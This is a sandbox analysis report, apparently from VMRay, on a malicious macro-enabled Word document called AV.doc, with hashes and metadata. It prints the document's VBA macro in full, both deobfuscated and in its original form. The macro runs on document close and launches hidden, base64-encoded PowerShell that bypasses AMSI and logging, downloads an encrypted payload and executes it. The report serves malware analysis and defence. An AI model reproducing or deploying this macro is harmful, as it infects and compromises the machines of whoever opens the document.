Try VMRay Platform
Malicious
Classifications

-

Threat Names

-

Dynamic Analysis Report

Created on 2024-05-15T16:27:55+00:00

AV.doc

Word Document
...
Filters:
File Name Category Type Verdict Actions
C:\Users\RDhJ0CNFevzX\Desktop\AV.doc Sample File Word Document
Malicious
...
»
MIME Type application/vnd.ms-word.document.macroEnabled.12
File Size 34.20 KB
MD5 b925abbb2e2b83226447f8707eae919f Copy to Clipboard
SHA1 5c263bc976e829a031e75325db4adbf1e6f57fe4 Copy to Clipboard
SHA256 db33f0b55c05c53cf70014dafd1a9de088deece6cf6f754c3e987bf0c384b726 Copy to Clipboard
SSDeep 768:GcgnVAwJlyYjADmiYnWhejz2pj8BOf9nG9jHW/Z:MuwJLjiKWgj+MOVG9jHW/Z Copy to Clipboard
ImpHash -
File Reputation Information
»
Verdict
Malicious
Office Information
»
Creator David Xia Zhou
Last Modified By David Xia Zhou
Revision 8
Create Time 2024-05-15 13:44 (UTC+2)
Modify Time 2024-05-15 14:32 (UTC+2)
Application Microsoft Office Word
App Version 16.0000
Template Normal.dotm
Document Security NONE
Editing Time 34.0
Page Count 1
ScaleCrop False
SharedDoc False
VBA Macros (2)
»
Macro #1: NewMacros
»
Deobfuscated Code 
Attribute VB_Name = "NewMacros"

Sub AutoClose()
    R
End Sub

Function R() As 
    Set asd = CreateObject("WScript.Shell")
    asd.Run "powershell -noP -sta -w 1 -enc  IAAkAHsARQBgAEoAZAB9ACAAIAA9ACAAIABbAHQAWQBQAGUAXQAoACIAewAxAH0AewA2AH0AewA1AH0AewA0AH0AewAwAH0AewA3AH0AewAzAH0AewAyAH0AIgAtAEYAJwBFAFYARQBOACcALAAnAHMAeQBzAFQAJwAsACcARABFAFIAJwAsACcASQAnACwAJwBpAE4AZwAuACcALAAnAGUAdgBFAG4AdAAnACwAJwBFAG0ALgBkAGkAYQBHAG4AbwBTAHQASQBjAHMALgAnACwAJwBUAFAAcgBPAHYAJwApADsAIAAmACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACcAUwAnACwAJwBFAFQAJwApACAAIAAoACcAaAAwACcAKwAnAHEAQgAnACkAIAAoACAAWwB0AFkAUABlAF0AKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAJwBFAEYAJwAsACcAUgAnACkAIAApACAAIAA7ACAALgAoACcAcwB2ACcAKQAgACAAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAEkAMABVACcALAAnAFcAJwApACAAIAAoACAAIABbAFQAWQBwAGUAXQAoACIAewAyAH0AewAzAH0AewAwAH0AewA2AH0AewAxAH0AewA0AH0AewA4AH0AewA1AH0AewA3AH0AIgAtAEYAJwBlAE0AJwAsACcAdAAuAFMAJwAsACcAcwB5AFMAJwAsACcAdAAnACwAJwBlAHIAVgBpAEMAZQBQAG8AJwAsACcAQQBnAEUAJwAsACcALgBOAEUAJwAsACcAcgAnACwAJwBpAE4AVABNAEEATgAnACkAIAApACAAOwAgACAAIAAmACgAJwBzAFYAJwApACAAIAAoACIAewAwAH0AewAxAH0AIgAtAGYAJwBzACcALAAnADcAWgA4ADUAJwApACAAIAAoACAAIABbAFQAWQBQAGUAXQAoACIAewAyAH0AewAwAH0AewAxAH0AIgAtAGYAJwBFAFgAVAAuAGUATgBDAG8ARAAnACwAJwBJAG4AZwAnACwAJwB0ACcAKQAgACkAIAA7ACQAewA4AHAAYAA2AGAAUwB3AHQAfQA9ACAAIABbAFQAeQBwAGUAXQAoACIAewAwAH0AewAxAH0AIgAgAC0ARgAgACcAQwBPAG4AVgBlAFIAJwAsACcAVAAnACkAOwAuACgAIgB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBmACAAJwBUAC0AJwAsACcAcwBFACcALAAnAEkAdABFAG0AJwApACAAKAAiAHsANAB9AHsAMQB9AHsAMwB9AHsAMAB9AHsAMgB9ACIALQBmACcAbgAnACwAJwBhAFIAaQBBACcALAAnAEYASwAnACwAJwBiAEwARQA6AEUAJwAsACcAdgAnACkAIAAgACgAIAAgAFsAVABZAFAARQBdACgAIgB7ADIAfQB7ADEAfQB7ADQAfQB7ADUAfQB7ADAAfQB7ADMAfQAiAC0AZgAgACcAZQBRACcALAAnAFQARQBtAC4ATgAnACwAJwBTAFkAUwAnACwAJwBVAEUAcwBUACcALAAnAEUAdAAuAFcARQAnACwAJwBCAFIAJwApACAAIAApADsAIAAgACQAewBhAHIAYABLAGAARAB6AG0AfQA9ACAAIABbAHQAWQBwAGUAXQAoACIAewA0AH0AewA2AH0AewA3AH0AewAzAH0AewAyAH0AewAwAH0AewA1AH0AewAxAH0AIgAgAC0AZgAgACcALgBDAFIARQAnACwAJwBhAEwAQwBhAEMASABFACcALAAnAC4AbgBlAHQAJwAsACcATQAnACwAJwBzACcALAAnAGQAZQBuAFQASQAnACwAJwB5AFMAdAAnACwAJwBlACcAKQAgACAAOwAgAC4AKAAiAHsAMAB9AHsAMQB9ACIALQBmACcAcwBlACcALAAnAFQAJwApACAAKAAnADUAJwArACcAUQBPADIAJwApACAAKAAgACAAWwB0AHkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMQB9AHsAMwB9ACIALQBmACcAUwBZAFMAVABFACcALAAnAC4ARQBOAEMAbwBkAGkAJwAsACcATQAnACwAJwBuAEcAJwAsACcALgB0AGUAeABUACcAKQAgACkAIAA7AEkAZgAoACQAewBQAFMAdgBFAHIAYABzAGAASQBvAGAATgB0AGAAQQBCAGwARQB9AC4AIgBwAFMAdgBlAFIAcwBpAGAATwBuACIALgAiAG0AYABBAGoAbwBSACIAIAAtAGcAZQAgADMAKQB7ACQAewByAGAAZQBGAH0APQAgACAAKAAgACAAJgAoACIAewAwAH0AewAyAH0AewAxAH0AIgAtAGYAIAAnAEcAJwAsACcAdAAtAGkAdABFAE0AJwAsACcAZQAnACkAIAAgACgAIgB7ADMAfQB7ADEAfQB7ADIAfQB7ADAAfQB7ADQAfQAiACAALQBmACAAJwAwACcALAAnADoAJwAsACcAaAAnACwAJwBWAEEAcgBJAEEAQgBMAGUAJwAsACcAcQBCACcAKQAgACAAKQAuAHYAYQBsAHUARQAuACIAQQBgAFMAcwBFAG0AYgBsAHkAIgAuACgAIgB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBmACcAdABUAHkAJwAsACcARwBlACcALAAnAHAAZQAnACkALgBJAG4AdgBvAGsAZQAoACgAIgB7ADgAfQB7ADcAfQB7ADQAfQB7ADEAfQB7ADMAfQB7ADIAfQB7ADAAfQB7ADUAfQB7ADYAfQAiAC0AZgAnAG0AYQAnACwAJwBhAGcAJwAsACcAbQBlAG4AdAAuAEEAdQB0AG8AJwAsACcAZQAnACwAJwBNAGEAbgAnACwAJwB0AGkAbwBuAC4AQQBtAHMAaQBVACcALAAnAHQAaQBsAHMAJwAsACcAdABlAG0ALgAnACwAJwBTAHkAcwAnACkAKQA7ACQAewByAGAAZQBGAH0ALgAoACIAewAxAH0AewAyAH0AewAwAH0AIgAgAC0AZgAgACcAZAAnACwAJwBHAGUAdAAnACwAJwBGAGkAZQBsACcAKQAuAEkAbgB2AG8AawBlACgAKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIALQBmACAAJwBtAHMAJwAsACcAbgBpAHQARgBhAGkAbABlAGQAJwAsACcAYQAnACwAJwBpAEkAJwApACwAKAAiAHsAMgB9AHsAMwB9AHsAMAB9AHsAMQB9ACIALQBmACAAJwB1AGIAbABpAGMALABTAHQAYQB0AGkAJwAsACcAYwAnACwAJwBOAG8AJwAsACcAbgBQACcAKQApAC4AKAAiAHsAMAB9AHsAMQB9AHsAMgB9ACIALQBmACcAUwAnACwAJwBlAHQAdgAnACwAJwBhAGwAdQBlACcAKQAuAEkAbgB2AG8AawBlACgAJAB7AG4AdQBgAGwATAB9ACwAJAB7AHQAYABSAHUARQB9ACkAOwAgACQAewBFAGAASgBkAH0ALgAoACIAewAwAH0AewAxAH0AIgAtAGYAIAAnAEcAZQAnACwAJwB0AEYAaQBlAGwAZAAnACkALgBJAG4AdgBvAGsAZQAoACgAIgB7ADIAfQB7ADEAfQB7ADAAfQAiACAALQBmACcAbABlAGQAJwAsACcAYgAnACwAJwBtAF8AZQBuAGEAJwApACwAKAAiAHsAMgB9AHsAMwB9AHsAMQB9AHsAMAB9AHsANAB9ACIAIAAtAGYAJwBJAG4AcwB0ACcALAAnAHUAYgBsAGkAYwAsACcALAAnAE4AbwBuACcALAAnAFAAJwAsACcAYQBuAGMAZQAnACkAKQAuACIAcwBFAHQAYABWAEEAbABgAFUAZQAiACgAIAAgACQAewBoADAAUQBiAH0ALgAiAEEAYABTAFMAYABlAE0AYgBMAHkAIgAuACgAIgB7ADIAfQB7ADAAfQB7ADEAfQAiAC0AZgAgACcAdABUACcALAAnAHkAcABlACcALAAnAEcAZQAnACkALgBJAG4AdgBvAGsAZQAoACgAIgB7ADQAfQB7ADEAfQB7ADUAfQB7ADMAfQB7ADYAfQB7ADAAfQB7ADgAfQB7ADIAfQB7ADcAfQAiACAALQBmACcAdABpAG8AbgAuAFQAcgBhAGMAaQBuAGcALgBQAFMARQAnACwAJwB5ACcALAAnAEwAbwBnAFAAcgBvAHYAaQAnACwAJwBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtACcALAAnAFMAJwAsACcAcwB0AGUAbQAuACcALAAnAGEAJwAsACcAZABlAHIAJwAsACcAdAB3ACcAKQApAC4AKAAiAHsAMAB9AHsAMgB9AHsAMQB9ACIALQBmACcARwBlAHQARgBpAGUAJwAsACcAZAAnACwAJwBsACcAKQAuAEkAbgB2AG8AawBlACgAKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAIAAnAHYAJwAsACcAcgAnACwAJwBlAHQAdwBQAHIAbwAnACwAJwBpAGQAZQAnACkALAAoACIAewAzAH0AewAwAH0AewAxAH0AewAyAH0AIgAgAC0AZgAnAG8AbgBQAHUAJwAsACcAYgBsAGkAYwAsAFMAdABhACcALAAnAHQAaQBjACcALAAnAE4AJwApACkALgAoACIAewAxAH0AewAwAH0AewAyAH0AIgAtAGYAIAAnAGUAJwAsACcARwAnACwAJwB0AFYAYQBsAHUAZQAnACkALgBJAG4AdgBvAGsAZQAoACQAewBuAHUAYABMAEwAfQApACwAMAApADsAfQA7ACAAKAAgACAAJgAoACIAewAwAH0AewAxAH0AewAyAH0AIgAgAC0AZgAnAFYAJwAsACcAYQBSAEkAQQBiACcALAAnAGwAZQAnACkAIAAgACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnADAAVQAnACwAJwB3AEkAJwApACAAIAAtAHYAQQBMAHUARQBvACkAOgA6ACIAZQBgAHgAcABlAEMAVAAxADAAMABDAE8ATgB0AGkAYABOAHUARQAiAD0AMAA7ACQAewBXAEMAfQA9ACYAKAAiAHsAMAB9AHsAMgB9AHsAMQB9ACIALQBmACAAJwBOACcALAAnAGoAZQBjAHQAJwAsACcAZQB3AC0ATwBiACcAKQAgACgAIgB7ADQAfQB7ADMAfQB7ADUAfQB7ADIAfQB7ADEAfQB7ADYAfQB7ADAAfQAiAC0AZgAnAGwAaQBlAG4AdAAnACwAJwAuACcALAAnAHQAJwAsACcAbQAuAE4AJwAsACcAUwB5AHMAdABlACcALAAnAGUAJwAsACcAVwBlAGIAQwAnACkAOwAkAHsAdQB9AD0AKAAiAHsAMwB9AHsAMQAyAH0AewA5AH0AewAxAH0AewAxADEAfQB7ADcAfQB7ADEAMAB9AHsANgB9AHsAMgB9AHsAOAB9AHsANAB9AHsAMQA0AH0AewAwAH0AewAxADMAfQB7ADUAfQAiACAALQBmACAAJwAwADsAJwAsACcAKABXAGkAbgBkAG8AdwAnACwAJwA7ACAAJwAsACcATQBvAHoAaQAnACwAJwBuAHQALwAnACwAJwByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcALAAnADYANAAnACwAJwAuADEAOwAgAFcATwAnACwAJwBUAHIAaQBkAGUAJwAsACcANQAuADAAIAAnACwAJwBXACcALAAnAHMAIABOAFQAIAA2ACcALAAnAGwAbABhAC8AJwAsACcAIAAnACwAJwA3AC4AJwApADsAJAB7AHMAYABFAFIAfQA9ACQAKAAgACAAJAB7AHMAYAA3AHoAYAA4ADUAfQA6ADoAIgB1AE4ASQBjAG8AYABkAEUAIgAuACIARwBgAEUAVABgAHMAdAByAEkAbgBHACIAKAAgACgAIAAuACgAIgB7ADAAfQB7ADIAfQB7ADEAfQAiACAALQBmACAAJwBnAGUAVAAtACcALAAnAGQASQBUAEUAbQAnACwAJwBDAGgAaQBsACcAKQAgACgAJwBWAEEAcgBpAGEAJwArACcAQgBsAEUAOgA4AHAAJwArACcANgAnACsAJwBzACcAKwAnAHcAdAAnACkAKQAuAHYAYQBsAFUARQA6ADoAKAAiAHsAMwB9AHsAMQB9AHsAMgB9AHsAMAB9ACIALQBmACcAaQBuAGcAJwAsACcAbwBtAEIAJwAsACcAYQBzAGUANgA0AFMAdAByACcALAAnAEYAcgAnACkALgBJAG4AdgBvAGsAZQAoACgAIgB7ADEAfQB7ADEAMAB9AHsAMQAyAH0AewAzAH0AewAyAH0AewAwAH0AewA4AH0AewA2AH0AewA1AH0AewAxADEAfQB7ADQAfQB7ADcAfQB7ADkAfQAiACAALQBmACcAQQBOAGcAQQA0AEEAQwA0AEEATQBRAEEAdQBBAEQAJwAsACcAYQBBACcALAAnAEEATQBnAEEAdQBBAEQARQAnACwAJwA2AEEAQwA4AEEATAB3AEEAeABBAEQAawAnACwAJwBNAEEAQQAnACwAJwBnAEEANgBBAEQAJwAsACcATQAnACwAJwA0AEEARABBACcALAAnAEkAQQAnACwAJwBBACcALAAnAEIAMABBAEgAUQAnACwAJwBnAEEAJwAsACcAQQBjAEEAQQAnACkAKQApACkAOwAkAHsAdAB9AD0AKAAiAHsAMAB9AHsAMgB9AHsAMQB9AHsAMwB9ACIALQBmACAAJwAvAGEAJwAsACcAbgAvAGcAZQB0AC4AJwAsACcAZABtAGkAJwAsACcAcABoAHAAJwApADsAJAB7AFcAQwB9AC4AIgBoAEUAYABBAGAAZABFAHIAcwAiAC4AKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAIAAnAEEAZAAnACwAJwBkACcAKQAuAEkAbgB2AG8AawBlACgAKAAiAHsAMAB9AHsAMgB9AHsAMQB9ACIAIAAtAGYAJwBVAHMAZQByACcALAAnAG4AdAAnACwAJwAtAEEAZwBlACcAKQAsACQAewBVAH0AKQA7ACQAewB3AGMAfQAuACIAcABgAFIATwBYAFkAIgA9ACAAKAAgACAALgAoACIAewAwAH0AewAyAH0AewAxAH0AIgAgAC0AZgAgACcAZwBFAFQALQBpACcALAAnAE0AJwAsACcAdABFACcAKQAgACgAIgB7ADIAfQB7ADAAfQB7ADEAfQB7ADMAfQAiAC0AZgAgACcAaQBhACcALAAnAGIATABlADoAZQBuACcALAAnAFYAYQByACcALAAnAGYASwAnACkAIAApAC4AdgBBAEwAdQBlADoAOgAiAEQARQBgAEYAQQB1AEwAYABUAHcAYABlAEIAUAByAG8AeABZACIAOwAkAHsAdwBgAGMAfQAuACIAcAByAGAATwBYAFkAIgAuACIAYwBgAFIAZQBEAEUATgBUAGAASQBgAEEAbABTACIAIAA9ACAAIAAkAHsAYQBSAGAASwBgAGQAWgBNAH0AOgA6ACIARABgAEUAYABGAGEAVQBsAHQATgBlAFQAVwBgAE8AUgBLAGAAYwByAGUARABlAG4AdABJAGEAYABsAFMAIgA7ACQAewBzAEMAUgBpAFAAYABUAGAAOgBgAHAAUgBvAFgAWQB9ACAAPQAgACQAewB3AGAAYwB9AC4AIgBQAGAAUgBPAFgAWQAiADsAJAB7AGsAfQA9ACAAJAB7ADUAcQBgAG8AMgB9ADoAOgAiAGEAUwBgAGMASQBpACIALgAiAEcAZQBUAGIAWQBgAFQAYABFAFMAIgAoACgAIgB7ADEAfQB7ADYAfQB7ADUAfQB7ADQAfQB7ADMAfQB7ADIAfQB7ADAAfQAiACAALQBmACAAJwBdACwAJwAsACcASQByACcALAAnAGQARABbAE0AfgBOACcALAAnADcAIQA9ACcALAAnAG8AbABHAEIAOAAnACwAJwAwAFYAQwBKAFgARgBXAHUAWQBLADEARQAnACwAJwBBACUAJwApACkAOwAkAHsAUgB9AD0AewAkAHsAZAB9ACwAJAB7AGsAfQA9ACQAewBBAFIAYABnAHMAfQA7ACQAewBzAH0APQAwAC4ALgAyADUANQA7ADAALgAuADIANQA1AHwALgAoACcAJQAnACkAewAkAHsASgB9AD0AKAAkAHsAagB9ACsAJAB7AHMAfQBbACQAewBfAH0AXQArACQAewBLAH0AWwAkAHsAXwB9ACUAJAB7AGsAfQAuACIAYwBvAGAAVQBOAFQAIgBdACkAJQAyADUANgA7ACQAewBTAH0AWwAkAHsAXwB9AF0ALAAkAHsAUwB9AFsAJAB7AGoAfQBdAD0AJAB7AHMAfQBbACQAewBKAH0AXQAsACQAewBzAH0AWwAkAHsAXwB9AF0AfQA7ACQAewBEAH0AfAAuACgAJwAlACcAKQB7ACQAewBJAH0APQAoACQAewBpAH0AKwAxACkAJQAyADUANgA7ACQAewBIAH0APQAoACQAewBoAH0AKwAkAHsAcwB9AFsAJAB7AGkAfQBdACkAJQAyADUANgA7ACQAewBTAH0AWwAkAHsAaQB9AF0ALAAkAHsAUwB9AFsAJAB7AEgAfQBdAD0AJAB7AFMAfQBbACQAewBoAH0AXQAsACQAewBzAH0AWwAkAHsASQB9AF0AOwAkAHsAXwB9AC0AYgB4AG8AcgAkAHsAUwB9AFsAKAAkAHsAcwB9AFsAJAB7AGkAfQBdACsAJAB7AHMAfQBbACQAewBoAH0AXQApACUAMgA1ADYAXQB9AH0AOwAkAHsAVwBgAEMAfQAuACIAaABFAGAAQQBkAGUAcgBTACIALgAoACIAewAxAH0AewAwAH0AIgAtAGYAJwBkAGQAJwAsACcAQQAnACkALgBJAG4AdgBvAGsAZQAoACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACcAbwBvAGsAaQBlACcALAAnAEMAJwApACwAKAAiAHsANgB9AHsAOAB9AHsAMgB9AHsANQB9AHsANAB9AHsAOQB9AHsAMQB9AHsANwB9AHsAMAB9AHsAMwB9ACIALQBmACcAcAAnACwAJwBXAC8AJwAsACcAaAB4ACcALAAnAEQATQBPAC8AZwBrAHkASABNAD0AJwAsACcAcQAnACwAJwArAG4ASgAwAG0AWABSAE8AJwAsACcAQQB5AFIAQwBvAGoAcAAnACwAJwBlAGoAJwAsACcAcwBoAG8AVwBrAHUAeQA9ACcALAAnAGIAUgAnACkAKQA7ACQAewBkAGAAQQBUAGEAfQA9ACQAewBXAGAAYwB9AC4AKAAiAHsAMQB9AHsAMgB9AHsAMwB9AHsAMAB9ACIALQBmACcAdABhACcALAAnAEQAbwB3AG4AbAAnACwAJwBvAGEAJwAsACcAZABEAGEAJwApAC4ASQBuAHYAbwBrAGUAKAAkAHsAcwBgAEUAUgB9ACsAJAB7AHQAfQApADsAJAB7AEkAYABWAH0APQAkAHsARABhAGAAVABhAH0AWwAwAC4ALgAzAF0AOwAkAHsAZABBAGAAVABhAH0APQAkAHsARABBAGAAVABhAH0AWwA0AC4ALgAkAHsARABhAGAAVABBAH0ALgAiAEwARQBgAE4AZwBUAGgAIgBdADsALQBqAG8AaQBuAFsAQwBoAGEAcgBbAF0AXQAoACYAIAAkAHsAUgB9ACAAJAB7AEQAYABBAFQAYQB9ACAAKAAkAHsAaQBgAFYAfQArACQAewBLAH0AKQApAHwAJgAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAnAEkAJwAsACcARQBYACcAKQA="
End Function

Original Code 
Attribute VB_Name = "NewMacros"
Sub AutoClose()
        R
End Sub

Public Function R() As Variant
        Dim VHd As String
        VHd = "powershell -noP -sta -w 1 -enc  IAAkAHsARQBgAEoAZA"
        VHd = VHd + "B9ACAAIAA9ACAAIABbAHQAWQBQAGUAXQAoACIAewAxAH0AewA2"
        VHd = VHd + "AH0AewA1AH0AewA0AH0AewAwAH0AewA3AH0AewAzAH0AewAyAH"
        VHd = VHd + "0AIgAtAEYAJwBFAFYARQBOACcALAAnAHMAeQBzAFQAJwAsACcA"
        VHd = VHd + "RABFAFIAJwAsACcASQAnACwAJwBpAE4AZwAuACcALAAnAGUAdg"
        VHd = VHd + "BFAG4AdAAnACwAJwBFAG0ALgBkAGkAYQBHAG4AbwBTAHQASQBj"
        VHd = VHd + "AHMALgAnACwAJwBUAFAAcgBPAHYAJwApADsAIAAmACgAIgB7AD"
        VHd = VHd + "AAfQB7ADEAfQAiAC0AZgAgACcAUwAnACwAJwBFAFQAJwApACAA"
        VHd = VHd + "IAAoACcAaAAwACcAKwAnAHEAQgAnACkAIAAoACAAWwB0AFkAUA"
        VHd = VHd + "BlAF0AKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAJwBFAEYAJwAs"
        VHd = VHd + "ACcAUgAnACkAIAApACAAIAA7ACAALgAoACcAcwB2ACcAKQAgAC"
        VHd = VHd + "AAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAEkAMABVACcA"
        VHd = VHd + "LAAnAFcAJwApACAAIAAoACAAIABbAFQAWQBwAGUAXQAoACIAew"
        VHd = VHd + "AyAH0AewAzAH0AewAwAH0AewA2AH0AewAxAH0AewA0AH0AewA4"
        VHd = VHd + "AH0AewA1AH0AewA3AH0AIgAtAEYAJwBlAE0AJwAsACcAdAAuAF"
        VHd = VHd + "MAJwAsACcAcwB5AFMAJwAsACcAdAAnACwAJwBlAHIAVgBpAEMA"
        VHd = VHd + "ZQBQAG8AJwAsACcAQQBnAEUAJwAsACcALgBOAEUAJwAsACcAcg"
        VHd = VHd + "AnACwAJwBpAE4AVABNAEEATgAnACkAIAApACAAOwAgACAAIAAm"
        VHd = VHd + "ACgAJwBzAFYAJwApACAAIAAoACIAewAwAH0AewAxAH0AIgAtAG"
        VHd = VHd + "YAJwBzACcALAAnADcAWgA4ADUAJwApACAAIAAoACAAIABbAFQA"
        VHd = VHd + "WQBQAGUAXQAoACIAewAyAH0AewAwAH0AewAxAH0AIgAtAGYAJw"
        VHd = VHd + "BFAFgAVAAuAGUATgBDAG8ARAAnACwAJwBJAG4AZwAnACwAJwB0"
        VHd = VHd + "ACcAKQAgACkAIAA7ACQAewA4AHAAYAA2AGAAUwB3AHQAfQA9AC"
        VHd = VHd + "AAIABbAFQAeQBwAGUAXQAoACIAewAwAH0AewAxAH0AIgAgAC0A"
        VHd = VHd + "RgAgACcAQwBPAG4AVgBlAFIAJwAsACcAVAAnACkAOwAuACgAIg"
        VHd = VHd + "B7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBmACAAJwBUAC0AJwAs"
        VHd = VHd + "ACcAcwBFACcALAAnAEkAdABFAG0AJwApACAAKAAiAHsANAB9AH"
        VHd = VHd + "sAMQB9AHsAMwB9AHsAMAB9AHsAMgB9ACIALQBmACcAbgAnACwA"
        VHd = VHd + "JwBhAFIAaQBBACcALAAnAEYASwAnACwAJwBiAEwARQA6AEUAJw"
        VHd = VHd + "AsACcAdgAnACkAIAAgACgAIAAgAFsAVABZAFAARQBdACgAIgB7"
        VHd = VHd + "ADIAfQB7ADEAfQB7ADQAfQB7ADUAfQB7ADAAfQB7ADMAfQAiAC"
        VHd = VHd + "0AZgAgACcAZQBRACcALAAnAFQARQBtAC4ATgAnACwAJwBTAFkA"
        VHd = VHd + "UwAnACwAJwBVAEUAcwBUACcALAAnAEUAdAAuAFcARQAnACwAJw"
        VHd = VHd + "BCAFIAJwApACAAIAApADsAIAAgACQAewBhAHIAYABLAGAARAB6"
        VHd = VHd + "AG0AfQA9ACAAIABbAHQAWQBwAGUAXQAoACIAewA0AH0AewA2AH"
        VHd = VHd + "0AewA3AH0AewAzAH0AewAyAH0AewAwAH0AewA1AH0AewAxAH0A"
        VHd = VHd + "IgAgAC0AZgAgACcALgBDAFIARQAnACwAJwBhAEwAQwBhAEMASA"
        VHd = VHd + "BFACcALAAnAC4AbgBlAHQAJwAsACcATQAnACwAJwBzACcALAAn"
        VHd = VHd + "AGQAZQBuAFQASQAnACwAJwB5AFMAdAAnACwAJwBlACcAKQAgAC"
        VHd = VHd + "AAOwAgAC4AKAAiAHsAMAB9AHsAMQB9ACIALQBmACcAcwBlACcA"
        VHd = VHd + "LAAnAFQAJwApACAAKAAnADUAJwArACcAUQBPADIAJwApACAAKA"
        VHd = VHd + "AgACAAWwB0AHkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9"
        VHd = VHd + "AHsAMQB9AHsAMwB9ACIALQBmACcAUwBZAFMAVABFACcALAAnAC"
        VHd = VHd + "4ARQBOAEMAbwBkAGkAJwAsACcATQAnACwAJwBuAEcAJwAsACcA"
        VHd = VHd + "LgB0AGUAeABUACcAKQAgACkAIAA7AEkAZgAoACQAewBQAFMAdg"
        VHd = VHd + "BFAHIAYABzAGAASQBvAGAATgB0AGAAQQBCAGwARQB9AC4AIgBw"
        VHd = VHd + "AFMAdgBlAFIAcwBpAGAATwBuACIALgAiAG0AYABBAGoAbwBSAC"
        VHd = VHd + "IAIAAtAGcAZQAgADMAKQB7ACQAewByAGAAZQBGAH0APQAgACAA"
        VHd = VHd + "KAAgACAAJgAoACIAewAwAH0AewAyAH0AewAxAH0AIgAtAGYAIA"
        VHd = VHd + "AnAEcAJwAsACcAdAAtAGkAdABFAE0AJwAsACcAZQAnACkAIAAg"
        VHd = VHd + "ACgAIgB7ADMAfQB7ADEAfQB7ADIAfQB7ADAAfQB7ADQAfQAiAC"
        VHd = VHd + "AALQBmACAAJwAwACcALAAnADoAJwAsACcAaAAnACwAJwBWAEEA"
        VHd = VHd + "cgBJAEEAQgBMAGUAJwAsACcAcQBCACcAKQAgACAAKQAuAHYAYQ"
        VHd = VHd + "BsAHUARQAuACIAQQBgAFMAcwBFAG0AYgBsAHkAIgAuACgAIgB7"
        VHd = VHd + "ADEAfQB7ADAAfQB7ADIAfQAiACAALQBmACcAdABUAHkAJwAsAC"
        VHd = VHd + "cARwBlACcALAAnAHAAZQAnACkALgBJAG4AdgBvAGsAZQAoACgA"
        VHd = VHd + "IgB7ADgAfQB7ADcAfQB7ADQAfQB7ADEAfQB7ADMAfQB7ADIAfQ"
        VHd = VHd + "B7ADAAfQB7ADUAfQB7ADYAfQAiAC0AZgAnAG0AYQAnACwAJwBh"
        VHd = VHd + "AGcAJwAsACcAbQBlAG4AdAAuAEEAdQB0AG8AJwAsACcAZQAnAC"
        VHd = VHd + "wAJwBNAGEAbgAnACwAJwB0AGkAbwBuAC4AQQBtAHMAaQBVACcA"
        VHd = VHd + "LAAnAHQAaQBsAHMAJwAsACcAdABlAG0ALgAnACwAJwBTAHkAcw"
        VHd = VHd + "AnACkAKQA7ACQAewByAGAAZQBGAH0ALgAoACIAewAxAH0AewAy"
        VHd = VHd + "AH0AewAwAH0AIgAgAC0AZgAgACcAZAAnACwAJwBHAGUAdAAnAC"
        VHd = VHd + "wAJwBGAGkAZQBsACcAKQAuAEkAbgB2AG8AawBlACgAKAAiAHsA"
        VHd = VHd + "MgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIALQBmACAAJwBtAHMAJw"
        VHd = VHd + "AsACcAbgBpAHQARgBhAGkAbABlAGQAJwAsACcAYQAnACwAJwBp"
        VHd = VHd + "AEkAJwApACwAKAAiAHsAMgB9AHsAMwB9AHsAMAB9AHsAMQB9AC"
        VHd = VHd + "IALQBmACAAJwB1AGIAbABpAGMALABTAHQAYQB0AGkAJwAsACcA"
        VHd = VHd + "YwAnACwAJwBOAG8AJwAsACcAbgBQACcAKQApAC4AKAAiAHsAMA"
        VHd = VHd + "B9AHsAMQB9AHsAMgB9ACIALQBmACcAUwAnACwAJwBlAHQAdgAn"
        VHd = VHd + "ACwAJwBhAGwAdQBlACcAKQAuAEkAbgB2AG8AawBlACgAJAB7AG"
        VHd = VHd + "4AdQBgAGwATAB9ACwAJAB7AHQAYABSAHUARQB9ACkAOwAgACQA"
        VHd = VHd + "ewBFAGAASgBkAH0ALgAoACIAewAwAH0AewAxAH0AIgAtAGYAIA"
        VHd = VHd + "AnAEcAZQAnACwAJwB0AEYAaQBlAGwAZAAnACkALgBJAG4AdgBv"
        VHd = VHd + "AGsAZQAoACgAIgB7ADIAfQB7ADEAfQB7ADAAfQAiACAALQBmAC"
        VHd = VHd + "cAbABlAGQAJwAsACcAYgAnACwAJwBtAF8AZQBuAGEAJwApACwA"
        VHd = VHd + "KAAiAHsAMgB9AHsAMwB9AHsAMQB9AHsAMAB9AHsANAB9ACIAIA"
        VHd = VHd + "AtAGYAJwBJAG4AcwB0ACcALAAnAHUAYgBsAGkAYwAsACcALAAn"
        VHd = VHd + "AE4AbwBuACcALAAnAFAAJwAsACcAYQBuAGMAZQAnACkAKQAuAC"
        VHd = VHd + "IAcwBFAHQAYABWAEEAbABgAFUAZQAiACgAIAAgACQAewBoADAA"
        VHd = VHd + "UQBiAH0ALgAiAEEAYABTAFMAYABlAE0AYgBMAHkAIgAuACgAIg"
        VHd = VHd + "B7ADIAfQB7ADAAfQB7ADEAfQAiAC0AZgAgACcAdABUACcALAAn"
        VHd = VHd + "AHkAcABlACcALAAnAEcAZQAnACkALgBJAG4AdgBvAGsAZQAoAC"
        VHd = VHd + "gAIgB7ADQAfQB7ADEAfQB7ADUAfQB7ADMAfQB7ADYAfQB7ADAA"
        VHd = VHd + "fQB7ADgAfQB7ADIAfQB7ADcAfQAiACAALQBmACcAdABpAG8Abg"
        VHd = VHd + "AuAFQAcgBhAGMAaQBuAGcALgBQAFMARQAnACwAJwB5ACcALAAn"
        VHd = VHd + "AEwAbwBnAFAAcgBvAHYAaQAnACwAJwBNAGEAbgBhAGcAZQBtAG"
